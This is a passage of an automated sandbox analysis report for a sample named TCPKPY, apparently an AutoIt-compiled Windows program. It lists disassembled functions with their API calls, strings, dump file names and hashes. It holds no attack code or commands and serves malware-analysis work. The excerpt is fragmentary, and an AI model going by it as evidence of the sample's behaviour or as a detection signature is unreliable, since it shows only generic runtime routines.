                                                                                                                • Opcode ID: 9b02c7a5d858b0d974bbb6ae6b48807f9fa2ec318d1296c0358fda44b358e0e6
                                                                                                                • Instruction ID: 11d9b73b158ecb26d161ccebd885c5f81cfdb4286eee2e473c181e9b58ced957
                                                                                                                • Opcode Fuzzy Hash: 9b02c7a5d858b0d974bbb6ae6b48807f9fa2ec318d1296c0358fda44b358e0e6
                                                                                                                • Instruction Fuzzy Hash: BEA1D4B1224317EFDB18DF64D884BAAB7A8FF04310F004519F999D7191EB30E969CB91
                                                                                                                Function 0023E69D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetClassNameW.USER32(00000008,?,00000400), ref: 0023E6E1
                                                                                                                • _wcscmp.LIBCMT ref: 0023E6F2
                                                                                                                • GetWindowTextW.USER32(00000001,?,00000400), ref: 0023E71A
                                                                                                                • CharUpperBuffW.USER32(?,00000000), ref: 0023E737
                                                                                                                • _wcscmp.LIBCMT ref: 0023E755
                                                                                                                • _wcsstr.LIBCMT ref: 0023E766
                                                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 0023E79E
                                                                                                                • _wcscmp.LIBCMT ref: 0023E7AE
                                                                                                                • GetWindowTextW.USER32(00000002,?,00000400), ref: 0023E7D5
                                                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 0023E81E
                                                                                                                • _wcscmp.LIBCMT ref: 0023E82E
                                                                                                                • GetClassNameW.USER32(00000010,?,00000400), ref: 0023E856
                                                                                                                • GetWindowRect.USER32(00000004,?), ref: 0023E8BF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                • String ID: @$ThumbnailClass
                                                                                                                • API String ID: 1788623398-1539354611
                                                                                                                • Opcode ID: 516f9f106e4761d2e96bb6d1d09d4d114d2c4aa5597fb24376e4a6eb31914541
                                                                                                                • Instruction ID: 8e7361fc897c7f17b3f027d96f58674697f0820ed656a7171b46f47850d8bf46
                                                                                                                • Opcode Fuzzy Hash: 516f9f106e4761d2e96bb6d1d09d4d114d2c4aa5597fb24376e4a6eb31914541
                                                                                                                • Instruction Fuzzy Hash: B78190B102830AABDF05CF10D885FAA77E8EF54714F04846AFD859A0D2DB30DD69CBA1
                                                                                                                Function 0023E4EA Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __wcsnicmp
                                                                                                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                • API String ID: 1038674560-1810252412
                                                                                                                • Opcode ID: 591dea1589cf09c8fc1ef5eb074312a8c028186059576dfda9260241e0af1297
                                                                                                                • Instruction ID: d674674a190f08c666ac3a26e3d54b9d2df91f440e1dfa1e72613e31c4c277c4
                                                                                                                • Opcode Fuzzy Hash: 591dea1589cf09c8fc1ef5eb074312a8c028186059576dfda9260241e0af1297
                                                                                                                • Instruction Fuzzy Hash: C231AB71A3430AEADB14EB50DD03EEE77A49F21784F610426B441710D2EBA1AF3C8E12
                                                                                                                Function 0023F898 Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadIconW.USER32(00000063), ref: 0023F8AB
                                                                                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0023F8BD
                                                                                                                • SetWindowTextW.USER32(?,?), ref: 0023F8D4
                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 0023F8E9
                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 0023F8EF
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0023F8FF
                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 0023F905
                                                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0023F926
                                                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0023F940
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0023F949
                                                                                                                • SetWindowTextW.USER32(?,?), ref: 0023F9B4
                                                                                                                • GetDesktopWindow.USER32 ref: 0023F9BA
                                                                                                                • GetWindowRect.USER32(00000000), ref: 0023F9C1
                                                                                                                • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0023FA0D
                                                                                                                • GetClientRect.USER32(?,?), ref: 0023FA1A
                                                                                                                • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0023FA3F
                                                                                                                • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0023FA6A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                • String ID:
                                                                                                                • API String ID: 3869813825-0
                                                                                                                • Opcode ID: 117534ac0a32e5a281a67c4a59b787cc49c78b0eb495a8fb17430afed8d7adc0
                                                                                                                • Instruction ID: 11120c3ba3ec29f2de382482ef6b15df420816bc09e4b12e5d88d4a067142ceb
                                                                                                                • Opcode Fuzzy Hash: 117534ac0a32e5a281a67c4a59b787cc49c78b0eb495a8fb17430afed8d7adc0
                                                                                                                • Instruction Fuzzy Hash: D151407590070AAFDB20DFA8EE89F6EBBF5FF04704F004529E596A25A0D774A958CF10
                                                                                                                Function 00257F3D Relevance: 25.6, APIs: 17, Instructions: 109COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 00257F53
                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00257F5E
                                                                                                                • LoadCursorW.USER32(00000000,00007F03), ref: 00257F69
                                                                                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 00257F74
                                                                                                                • LoadCursorW.USER32(00000000,00007F01), ref: 00257F7F
                                                                                                                • LoadCursorW.USER32(00000000,00007F81), ref: 00257F8A
                                                                                                                • LoadCursorW.USER32(00000000,00007F88), ref: 00257F95
                                                                                                                • LoadCursorW.USER32(00000000,00007F80), ref: 00257FA0
                                                                                                                • LoadCursorW.USER32(00000000,00007F86), ref: 00257FAB
                                                                                                                • LoadCursorW.USER32(00000000,00007F83), ref: 00257FB6
                                                                                                                • LoadCursorW.USER32(00000000,00007F85), ref: 00257FC1
                                                                                                                • LoadCursorW.USER32(00000000,00007F82), ref: 00257FCC
                                                                                                                • LoadCursorW.USER32(00000000,00007F84), ref: 00257FD7
                                                                                                                • LoadCursorW.USER32(00000000,00007F04), ref: 00257FE2
                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00257FED
                                                                                                                • LoadCursorW.USER32(00000000,00007F89), ref: 00257FF8
                                                                                                                • GetCursorInfo.USER32(?), ref: 00258008
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Cursor$Load$Info
                                                                                                                • String ID:
                                                                                                                • API String ID: 2577412497-0
                                                                                                                • Opcode ID: 1808e4db669e82c55dd5ab60c1977393b24dd47283883b9085f41d035d7c9edc
                                                                                                                • Instruction ID: dd2043617cb0d77ca15da0797b043e43642445c3c8e03ebf784cf6aed23134a1
                                                                                                                • Opcode Fuzzy Hash: 1808e4db669e82c55dd5ab60c1977393b24dd47283883b9085f41d035d7c9edc
                                                                                                                • Instruction Fuzzy Hash: 96312BB0D5431AAADB109FB68C8986EBFE8FF04750F504536E50DF71C0DAB8A9048F95
                                                                                                                Function 002501E4 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 237COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _wcscpy.LIBCMT ref: 0025026A
                                                                                                                • _wcschr.LIBCMT ref: 00250278
                                                                                                                • _wcscpy.LIBCMT ref: 0025028F
                                                                                                                • _wcscat.LIBCMT ref: 0025029E
                                                                                                                • _wcscat.LIBCMT ref: 002502BC
                                                                                                                • _wcscpy.LIBCMT ref: 002502DD
                                                                                                                • __wsplitpath.LIBCMT ref: 002503BA
                                                                                                                • _wcscpy.LIBCMT ref: 002503DF
                                                                                                                • _wcscpy.LIBCMT ref: 002503F1
                                                                                                                • _wcscpy.LIBCMT ref: 00250406
                                                                                                                • _wcscat.LIBCMT ref: 0025041B
                                                                                                                • _wcscat.LIBCMT ref: 0025042D
                                                                                                                • _wcscat.LIBCMT ref: 00250442
                                                                                                                  • Part of subcall function 0024C890: _wcscmp.LIBCMT ref: 0024C92A
                                                                                                                  • Part of subcall function 0024C890: __wsplitpath.LIBCMT ref: 0024C96F
                                                                                                                  • Part of subcall function 0024C890: _wcscpy.LIBCMT ref: 0024C982
                                                                                                                  • Part of subcall function 0024C890: _wcscat.LIBCMT ref: 0024C995
                                                                                                                  • Part of subcall function 0024C890: __wsplitpath.LIBCMT ref: 0024C9BA
                                                                                                                  • Part of subcall function 0024C890: _wcscat.LIBCMT ref: 0024C9D0
                                                                                                                  • Part of subcall function 0024C890: _wcscat.LIBCMT ref: 0024C9E3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                                                • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                • API String ID: 2955681530-2806939583
                                                                                                                • Opcode ID: 3694e1633ff48432e0430233728092e609af8c9322eab99702479c39645cc70d
                                                                                                                • Instruction ID: 281fa4a10a73f7e671428401738dbe60121d18f4f1541efe247f08945c320d79
                                                                                                                • Opcode Fuzzy Hash: 3694e1633ff48432e0430233728092e609af8c9322eab99702479c39645cc70d
                                                                                                                • Instruction Fuzzy Hash: 0691A171524702AFCB20EF50DC95F9BB3E8AF94310F044859F98597292EB34EA68CF56
                                                                                                                Function 0026CC68 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 0026CD0B
                                                                                                                • DestroyWindow.USER32(00000000,?), ref: 0026CD83
                                                                                                                  • Part of subcall function 00207E53: _memmove.LIBCMT ref: 00207EB9
                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0026CE04
                                                                                                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0026CE26
                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0026CE35
                                                                                                                • DestroyWindow.USER32(?), ref: 0026CE52
                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00200000,00000000), ref: 0026CE85
                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0026CEA4
                                                                                                                • GetDesktopWindow.USER32 ref: 0026CEB9
                                                                                                                • GetWindowRect.USER32(00000000), ref: 0026CEC0
                                                                                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0026CED2
                                                                                                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0026CEEA
                                                                                                                  • Part of subcall function 0021B155: GetWindowLongW.USER32(?,000000EB), ref: 0021B166
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                • String ID: 0$tooltips_class32
                                                                                                                • API String ID: 1297703922-3619404913
                                                                                                                • Opcode ID: 7cd4c5371ed7ce66191f3efdac5d2292a5b107b8a3c8c80bdcf38a61c4bc47fb
                                                                                                                • Instruction ID: f461e9e668328e13102fe551eac17863db01d1e37f40a05c1f7ee10be5d95681
                                                                                                                • Opcode Fuzzy Hash: 7cd4c5371ed7ce66191f3efdac5d2292a5b107b8a3c8c80bdcf38a61c4bc47fb
                                                                                                                • Instruction Fuzzy Hash: 4D71CCB116430AAFE720DF28DC49FBA3BF5EB89700F640518F985972A2D771E861CB11
                                                                                                                Function 0026F122 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0021AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0021AF8E
                                                                                                                • DragQueryPoint.SHELL32(?,?), ref: 0026F14B
                                                                                                                  • Part of subcall function 0026D5EE: ClientToScreen.USER32(?,?), ref: 0026D617
                                                                                                                  • Part of subcall function 0026D5EE: GetWindowRect.USER32(?,?), ref: 0026D68D
                                                                                                                  • Part of subcall function 0026D5EE: PtInRect.USER32(?,?,0026EB2C), ref: 0026D69D
                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0026F1B4
                                                                                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0026F1BF
                                                                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0026F1E2
                                                                                                                • _wcscat.LIBCMT ref: 0026F212
                                                                                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0026F229
                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0026F242
                                                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 0026F259
                                                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 0026F27B
                                                                                                                • DragFinish.SHELL32(?), ref: 0026F282
                                                                                                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0026F36D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                • API String ID: 169749273-3440237614
                                                                                                                • Opcode ID: 6f48ba73daac12207344c6447a19fcdd75663247fb0177e35d140a62ac45d3d5
                                                                                                                • Instruction ID: 97e3500f9b0bf5e705693ec902a52b9730786c4ec70c68172134edec6a9e658c
                                                                                                                • Opcode Fuzzy Hash: 6f48ba73daac12207344c6447a19fcdd75663247fb0177e35d140a62ac45d3d5
                                                                                                                • Instruction Fuzzy Hash: 5F616C75118304AFD700EF60EC89D9BBBF8BF89750F500A1DF595921A2DB309A69CF52
                                                                                                                Function 0024B428 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 350timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(00000000), ref: 0024B46D
                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 0024B476
                                                                                                                • VariantClear.OLEAUT32(?), ref: 0024B482
                                                                                                                • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0024B561
                                                                                                                • __swprintf.LIBCMT ref: 0024B591
                                                                                                                • VarR8FromDec.OLEAUT32(?,?), ref: 0024B5BD
                                                                                                                • VariantInit.OLEAUT32(?), ref: 0024B63F
                                                                                                                • SysFreeString.OLEAUT32(00000016), ref: 0024B6D1
                                                                                                                • VariantClear.OLEAUT32(?), ref: 0024B727
                                                                                                                • VariantClear.OLEAUT32(?), ref: 0024B736
                                                                                                                • VariantInit.OLEAUT32(00000000), ref: 0024B772
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                                                • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                • API String ID: 3730832054-3931177956
                                                                                                                • Opcode ID: dee526159e6e68916bc790c19b9167631d8cd9c2ff4b7f4da95d07a8a311c964
                                                                                                                • Instruction ID: 4a260225678cc3c6a3decbf1101a677a720dc29f3dcb7e63b06d50261d00d271
                                                                                                                • Opcode Fuzzy Hash: dee526159e6e68916bc790c19b9167631d8cd9c2ff4b7f4da95d07a8a311c964
                                                                                                                • Instruction Fuzzy Hash: 11C12571A20616EBCB1ADFA5D894B6AF7B5FF09300F148465E4059B192CBB0EC74DFA0
                                                                                                                Function 00266F67 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00266FF9
                                                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00267044
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharMessageSendUpper
                                                                                                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                • API String ID: 3974292440-4258414348
                                                                                                                • Opcode ID: 4074b1f90bb67d926658b3f19e540f872ada5c3c829867d6c51ca5002178c8e1
                                                                                                                • Instruction ID: 3ff0be759648446a8f4a034a16d400a66340321b2316c02e503b8849949a9f13
                                                                                                                • Opcode Fuzzy Hash: 4074b1f90bb67d926658b3f19e540f872ada5c3c829867d6c51ca5002178c8e1
                                                                                                                • Instruction Fuzzy Hash: 3F91C4342243019FCB14EF10D851AAAB7E2AF94354F15486DF8965B3A3CB31EDAACF51
                                                                                                                Function 0026E305 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0026E3BB
                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0026BCBF), ref: 0026E417
                                                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0026E457
                                                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0026E49C
                                                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0026E4D3
                                                                                                                • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0026BCBF), ref: 0026E4DF
                                                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0026E4EF
                                                                                                                • DestroyIcon.USER32(?,?,?,?,?,0026BCBF), ref: 0026E4FE
                                                                                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0026E51B
                                                                                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0026E527
                                                                                                                  • Part of subcall function 00221BC7: __wcsicmp_l.LIBCMT ref: 00221C50
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                                • String ID: .dll$.exe$.icl
                                                                                                                • API String ID: 1212759294-1154884017
                                                                                                                • Opcode ID: 76546be7ddc5f797807bbf4e6e4520d394499be1550aea55ae89cc76bf128cb7
                                                                                                                • Instruction ID: 739baad921bf2b6f1bb7eff293632ca6b548bfc95ca573c22032f88425678ba9
                                                                                                                • Opcode Fuzzy Hash: 76546be7ddc5f797807bbf4e6e4520d394499be1550aea55ae89cc76bf128cb7
                                                                                                                • Instruction Fuzzy Hash: E361BE75520215BEEF24DFB4DC86FBA77A8AB08710F108205F915E61D1EBB499A4CBA0
                                                                                                                Function 00250E41 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 184timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetLocalTime.KERNEL32(?), ref: 00250EFF
                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00250F0F
                                                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00250F1B
                                                                                                                • __wsplitpath.LIBCMT ref: 00250F79
                                                                                                                • _wcscat.LIBCMT ref: 00250F91
                                                                                                                • _wcscat.LIBCMT ref: 00250FA3
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00250FB8
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00250FCC
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00250FFE
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0025101F
                                                                                                                • _wcscpy.LIBCMT ref: 0025102B
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0025106A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
